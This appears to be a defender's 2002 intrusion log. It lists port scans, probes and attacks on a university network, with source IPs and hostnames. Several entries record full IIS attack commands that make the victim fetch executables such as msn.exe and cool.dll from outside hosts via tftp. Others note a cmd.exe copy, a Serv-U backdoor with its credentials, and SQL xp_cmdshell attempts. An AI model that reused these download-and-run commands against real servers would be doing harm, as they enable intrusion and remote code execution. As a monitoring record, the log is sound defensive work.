2002/07/23-15:23:11.26 212.195.67.217 (lns12m-4-217.w.club-internet.fr) scannet for port 21
2002/07/23-16:25:30.81 24.201.170.22 (modemcable022.170-201-24.mtl.mc.videotron.ca) beat on net for ports 224,80,,137,139 
2002/07/23-23:10:53.96 80.139.231.84 (p508BE754.dip.t-dialin.net) scannet for port 21
2002/07/24-04:47:23.70 192.148.138.100 (Telstra,MELBOURNE,AU) scannet for porTS 22,21,1433
2002/07/24-04:47:38.39 192.148.138.100 (Telstra,MELBOURNE,AU) scannet fo rport 21, 1433
2002/07/24-07:56:02.33 217.41.63.23 (host217-41-63-23.in-addr.btopenworld.com) scannet for ports 80,445,139,137
2002/07/24-10:42:59.51 24.43.54.240 (CPE0080c6f02f26.cpe.net.cable.rogers.com) probe port 445 select ips on net
2002/07/24-12:53:15.38 24.123.46.10 (rrcs-central-24-123-46-10.biz.rr.com) scannet for ports 23, 53, 113, 515 
2002/07/24-13:56:38.57 65.223.127.153 (Rockliffe,CA,US) scannet for port 25
2002/07/24-21:34:05.82 131.103.121.94 (d1-0-0-3-3.a02.mlpsca01.us.ce.verio.net) 1. attack IIS server on 132.235.18.105 w/command
2002/07/24-21:34:05.82 131.103.121.94 (d1-0-0-3-3.a02.mlpsca01.us.ce.verio.net) 2. tftp.exe%20-i%20217.129.192.249%20get%20msn.exe%20
2002/07/24-22:48:20.07 138.238.16.72 (Howard University,Washington,DC) scnannet for port 1433
2002/07/24-23:37:40.68 24.162.97.233 (cs2416297-233.hot.rr.com) scannet for ports 80, 445, 139
2002/07/25-01:03:10.19 62.194.76.62 (node-c-4c3e.a2000.nl) scannet fo rport 1433
2002/07/25-01:53:44.85 142.177.209.70 (nat209-80.mpoweredpc.net) scannet for port 22
2002/07/25-04:56:25.86 211.184.242.2 (korea crap) scannet for port 21
2002/07/25-04:56:39.55 211.184.242.2 (KYOUNGGU MIDDLE SCHOOL,KYONGBUK,KR) scannet for port 1433
2002/07/25-09:42:47.70 67.81.112.13 (ool-4351700d.dyn.optonline.net) scan net for port 139
2002/07/25-11:22:19.21 62.208.56.95:1998 (PlusServer GmbH,DE) telnet buff overflow attack against  132.235.17.17
2002/07/25-12:05:03.18 63.147.83.244 (I Park,SanJose,CA,US) scannet fo r port 1433,SQL attack xp_cmdshell - program execution
2002/07/25-15:16:30.99 216.182.52.4 (Tellurian Networks,NJ,US) scannet fo rprt 1433
2002/07/25-19:17:11.81 194.85.32.18 (ns.runnet.ru) scan select ips for port 1080
2002/07/25-19:17:11.81 195.175.238.161 (nwusr-40608.dial-in.ttnet.net.tr) slow scan of select ips for port 1080
2002/07/26-02:29:45.46 207.224.28.89 (mail.glickhead.com) scan net for port 3128
2002/07/26-02:56:01.25 209.246.72.191 () 1. dialup-209.246.72.191.Dial1.NewYork1.Level3.net
2002/07/26-02:56:01.25 209.246.72.191 () 2. attack 132.235.18.105 via IIS, ftp servudaemon from 138.87.45.4 shit/shit
2002/07/26-02:56:01.25 209.246.72.191 () 3. start servudaemon in \temp on port 5078 admin/!johndoe!
2002/07/26-09:23:29.55 218.7.43.254 (Harbin Engineering University 1,CN) IIS attack w/ tftp%20-i%20132.112.101.1%20GET%20cool.dll%20c:\httpodbc.dll
2002/07/26-09:31:21.09 217.80.65.15 (pD950410F.dip.t-dialin.net) IIS probe port 80 , servers answer on port 500
2002/07/26-09:41:28.54 217.80.65.15 (pD950410F.dip.t-dialin.net) IIS attack cmds = mkdir+c:\temp\temp\images\
2002/07/26-10:48:46.02 62.163.137.154 (a137154.upc-a.chello.nl) IIs attack 132.235.18.105 w/cmd tftp.exe+"-i"+62.163.137.154+get+WINMGNT.EXE
2002/07/26-11:11:37.06 211.52.53.251 (Korea crap) scannet for port 1433
2002/07/26-11:14:21.31 64.58.147.102 (COX COMUNICATIONS,CA,US) scannet fo rport 1433
2002/07/26-11:56:07.65 216.194.66.84 (devsik.com - CA) scannet fo rport 1080
2002/07/26-12:05:32.58 24.43.54.240 (CPE0080c6f02f26.cpe.net.cable.rogers.com) probe port 445 on microsoft machines
2002/07/26-13:07:24.16 63.127.111.50 (Contrado Inc.,TX,US) try to login to web server as root/Hindi_mp3z using telnet.
2002/07/26-13:16:16.53 216.104.118.248 (cable118-248.sudbury.cyberbeach.net) scannet for port 139
2002/07/26-15:34:17.38 203.129.254.22 (TP-Pune POP,IN) attack IIS on 132.235.18.105 w/ cmd tftp%20-i%20132.132.32.170%20GET%20cool.dll
2002/07/26-17:34:33.25 216.237.145.141 (Delta Internet Services,CA,US) scannet for port 1433
2002/07/26-17:42:31.09 217.5.114.148 (cw07.MD1.srv.t-online.de) attack IIS on 132.235.18.105 w/ cmd copy+c:\winnt\system32\cmd.exe+superlol.exe
2002/07/26-18:30:47.50 24.102.152.215 (CPE0080c6f080e6.cpe.net.cable.rogers.com) IIS attack on 132.235.18.105
2002/07/26-20:31:17.08 24.50.160.112 (pa-plum1a-112.pit.adelphia.net) scannet with ping, then for ports 1025, 6588
2002/07/26-20:32:49.66 24.50.160.112 (pa-plum1a-112.pit.adelphia.net) ping scan of net
2002/07/26-20:44:18.95 203.151.79.202 (Dunkin Donuts,TH) scannet for port 1433
2002/07/26-20:50:33.17 203.151.79.150 (Dunkin Donuts,TH) scannet for port 1433
2002/07/27-02:09:55.15 209.101.135.199 (mdabord2.meridiandesign.com) scannet for port 25
2002/07/27-02:10:27.14 209.107.71.10 (Verio, Inc. ) scannet for port 25
2002/07/27-02:11:01.33 200.11.69.170 (Entel S.A.,CL) scannet for port 25
2002/07/27-06:33:05.32 213.238.149.10(Ihlas Net ISP,TR) scannet for port 1080
2002/07/27-11:02:18.69 194.85.32.18 (ns.runnet.ru) scannet fo rport 1080
2002/07/27-21:26:06.19 24.66.43.26 (h24-66-43-26.wp.shawcable.net) probe ports 445.139,137,80 on net, probe 445,139 hard on win machies
2002/07/27-22:54:18.20 68.58.22.17 (pcp01089863pcs.spedwy01.in.comcast.net) scannet for port 21
2002/07/27-23:15:39.59 61.34.16.130 (Yousung Hotel,KR) scannet fo rport 53
2002/07/28-06:03:38.34 63.143.182.149 (149.winstar.net) scannet fo r port 139
2002/07/28-09:00:36.58 68.58.22.17(pcp01089863pcs.spedwy01.in.comcast.net) ping scan of net
2002/07/26-12:39:41.44 62.109.69.188 (b069188.adsl.hansenet.de) IIS attack - SAM Attempt
2002/07/26-20:30:53.38 24.50.160.112 (pa-plum1a-112.pit.adelphia.net) scannet with ping
2002/07/28-08:51:14.62 68.58.22.17 (pcp01089863pcs.spedwy01.in.comcast.net) scannet for port 21, 80 5120 
2002/07/28-11:35:06.44 172.184.254.254 (America Online, Inc.) scannet for port 21
2002/07/28-15:34:16.08 151.42.234.11 (IUnet,IT) scannet for port 139
2002/07/28-16:38:17.78 80.78.160.95 (admin4.telta.de) scannet for port 6112
2002/07/28-18:28:18.18 210.108.211.11 (ELECTRO LAND,SEOUL,KR) scannet for port 22
2002/07/29-03:30:13.44 209.220.92.162 (w162.z209220092.nyc-ny.dsl.cnc.net) scannet for port 1433
2002/07/29-05:12:30.18 209.220.92.162 (w162.z209220092.nyc-ny.dsl.cnc.net) attack MS-SQL w/user = sa
2002/07/29-07:22:46.14 218.113.216.100 (YahooBB218113216100.bbtec.net) TELNET solaris memory mismanagement exploit on multiple ips.
2002/07/29-11:16:59.80 80.71.96.16 (Keyworld,San Gwann, Malta) scannet for port 6112, buff overflow attack - cde
2002/07/29-13:29:18.72 210.126.108.197 (Nits,TAEJON,KR) scannet for port 21
2002/07/29-18:02:57.48 24.130.136.177 (-24-130-136-177.we.client2.attbi.com) scannet for port 445,80
2002/07/29-19:11:48.57 213.177.132.208 (adsl-132-208.wanadoo.be) scannet for port 21
2002/07/30-14:09:34.06 80.13.120.146 (ALille-208-1-2-146.abo.wanadoo.fr) scannet for port 1433
2002/07/30-18:00:04.55 210.243.153.200 (h200-210-243-153.seed.net.tw) scannet for port 1433
2002/07/30-19:37:44.81 209.115.212.185 (185.209-115-212-0.interbaun.com) scannet for port 139
2002/07/31-04:46:57.06 172.180.190.190 (ACB4BEBE.ipt.aol.com) scannet for port 21
2002/07/31-07:44:10.85 129.123.47.79 (erportal.hsg.usu.edu) scannet for port 1433
2002/07/31-13:21:44.77 211.44.112.179 (HANARO Telecom,KR) scannet for port 21
2002/07/31-19:21:53.39 24.192.39.25 (CPE0004230741c9-CM0010954a69d7.cpe.net.cable.rogers.com) scannet for port 80, 445
2002/07/31-21:27:34.62 24.208.177.125 (dhcp024-208-177-125.columbus.rr.com) bang on network printer port 631 to  2002/08/01-00:25:53.19
2002/08/08-05:46:26.11 218.2.166.23 (CHINANET jiangsu province network)scannet for ports 8080,8888,10088,81,3128,80,8000,8001,1080,1815,5262
2002/08/08-10:02:37.15 172.182.225.247 (ACB6E1F7.ipt.aol.com) scannet for port 21
2002/08/08-15:12:03.21 172.186.75.118 (ACBA4B76.ipt.aol.com) scannet for port 21
2002/08/08-21:03:45.07 213.98.20.99 (213-98-20-99.uc.nombres.ttd.es) use anon ftp to get dummy passwd file from ace
2002/08/09-01:54:30.25 217.1.77.163 (pD9014DA3.dip.t-dialin.net) scannet for port 21
2002/08/09-03:37:03.25 65.198.68.56 (netmapper.research.lumeta.com) probe 1 high num port on 132.235.1.3
2002/08/09-04:00:32.92 64.58.166.193 (64-58-166-193.cbi.cox-oc.net) scannet fo rport 6112
2002/08/09-05:17:40.65 80.35.246.93 (93.Red-80-35-246.pooles.rima-tde.net) use anon ftp to get dummy passwd file from ace
2002/08/09-05:20:53.53 172.173.162.178 (ACADA2B2.ipt.aol.com) scannet for port 512-probe ports 7,23,37